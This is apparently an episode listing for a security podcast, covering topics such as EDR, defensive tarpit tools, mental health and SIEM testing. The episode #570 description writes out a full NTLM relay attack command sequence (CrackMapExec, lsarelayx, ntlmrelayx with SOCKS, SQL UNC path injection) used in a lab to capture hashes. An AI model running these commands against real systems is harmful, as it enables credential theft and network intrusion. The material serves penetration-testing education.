7MS #578: Interview with Mike Toole of Blumira
Today I'm excited to share a featured interview with our new friend Mike Toole of Blumira. We talk about all things EDR, including: How does it differ from something like Windows Defender? What things do I need to keep in mind if I'm in the market for an EDR purchase? Is Mac EDR any good? How do attackers bypass EDR? Will AI create industructible malware, take over the human race and then use our bodies for batteries?
30 Kesä 20231h
7MS #577: Tales of Pentest Pwnage - Part 48
Holy schnikes - this episode is actually 7 minutes long! What a concept! Anyway, today I give you a couple tips that have helped me pwn some internal networks the last few weeks, including: Getting a second (and third?) opinion on Active Directory Certificate Services vulnerabilities! Analyzing the root domain object in BloodHound to find some misconfigs that might equal instant domain admin access!
16 Kesä 20237min
7MS #575: Annoying Attackers with ADHD - Part 2
Hey friends! Today we're taking a second look at ADHD - Active Defense Harbinger Distribution - a cool VM full of tools designed to annoy/attribute/attack pesky attackers! The tools covered today include: PHP-HTTP-TARPIT A tool to confuse and waste bot/scanner/hacker time. Grab it here and check out our setup instructions: sudo git clone https://github.com/msigley/PHP-HTTP-Tarpit.git /opt/tarpit cd /opt/tarpit sudo mv la_brea.php /var/www/html/index.php cd /var/www/html/ # Delete the default HTMLM files that are there sudo rm DEFAULT .HTML FILES # Start/restart apache2 sudo service apache2 stop sudo service apache2 start # It's easier to see PHP-HTTP-TARPIT in action from command line: curl -i http://IP.RUNNING.THE.TARPIT Spidertrap This tool tangles Web visitors in a never-ending maze of pages with links! sudo git clone https://github.com/adhdproject/spidertrap.git /opt/spidertrap cd /opt/spidertrap # Open spidertrap.py and change listening port from 8080 to 80 sudo nano spidertrap.py # Run the trap sudo python3 spidertrap.py Weblabyrinth This tool presents visitors with a blurb of text from Alice in Wonderland. That text has links that takes them to...you guessed it...more Alice in Wonderland excerpts! I especially like that if you visit ANY folder or link inside Weblabyrinth, content is served (return code 200 for anything and everything). I had problems getting this running on a fresh Kali box so it's probably better to run right off the ADHD distro using their instructions.
9 Kesä 202333min
7MS #574: Annoying Attackers with ADHD
Hey friends! Today we're looking at ADHD - Active Defense Harbinger Distribution - a cool VM full of tools designed to annoy/attribute/attack pesky attackers! ADHD gets you up and running with these tools quickly, but the distro hasn't been updated in a while, so I switched to a vanilla Kali system and setup a cowrie SSH honeypot as follows (see 7ms.us for full list of commands).
2 Kesä 202336min
7MS #573: Securing Your Mental Health - Part 4
Today we're talking about reducing anxiety by hacking your mental health with these tips: Using personal automation to text people important reminders Using Remind to create a personal communication "class" with your family members Using Smartsheet (not a sponsor) to create daily email "blasts" to yourself about all the various project todos you need to tackle
26 Touko 202336min
7MS #572: Protecting Your Domain Controllers with LDAP Firewall
Today we look at LDAP Firewall - a cool (and free!) way to defend your domain controllers against SharpHound enumeration, LAPS password enumeration, and the noPac attack.
19 Touko 202326min
7MS #571: Simple Ways to Test Your SIEM - Part 2
Hey friends! This week I spoke at the Secure360 conference in Minnesota on Simple Ways to Test Your SIEM. This is something I covered a while back on the podcast, but punched up the content a bit and built a refreshed a two-part GitHub gist that covers: Questions you can ask a prospective SIEM/SOC solution to figure out which one is the right fit for you All the tools/tips/scripts/etc. you need to run through 7 (and more!) simple ways to test your SIEM!
12 Touko 202331min
7MS #570: How to Build a Vulnerable Pentest Lab - Part 4
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! In today's episode we staged an NTLM relay attack using a vulnerable SQL server. First we used CrackMapExec (see our two part series on Cracking and Mapping and Execing with CrackMapExec - part 1 / part 2) to find hosts with SMB signing disabled: cme smb x.x.x.x/24 -u USER -p PASS --gen-relay-list smbsigning.txt Then we setup lsarelayx in one window: lsarelayx --host=localhost And in a second window we ran ntlmrelayx.py: python ntlmrelayx.py -smb2support --no-smb-server -t smb://VICTIM Finally, in a third window we triggered authentication from the vulnerable SQL server: Invoke-SQLUncPathInjection -verbose -captureip OUR.ATTACKING.IP.ADDRESS Boom! Watch the local usernames and hashes fall out of the victim system. We also tried doing a multirelay scenario where we had a list of victim hosts in a targets.txt file like this: victim1 victim2 victim3 Then we tweaked the ntlmrelayx command slightly: python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt Interestingly(?) only victim2 was attacked. Lastly, we ran the same attack but added the -socks option to establish SOCKS connections upon successful relay: python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt -socks Interestingly(?) we got a low-priv user to relay and setup a SOCKS connection, but not the domain admin configured on the SQL server. TLDR/TLDL: relaying credentials to a single victim with ntlmrelay on a Windows hosts seems to work great! Your milage may vary if you try to pull off more advanced tricks with ntlmrelay.
5 Touko 202332min
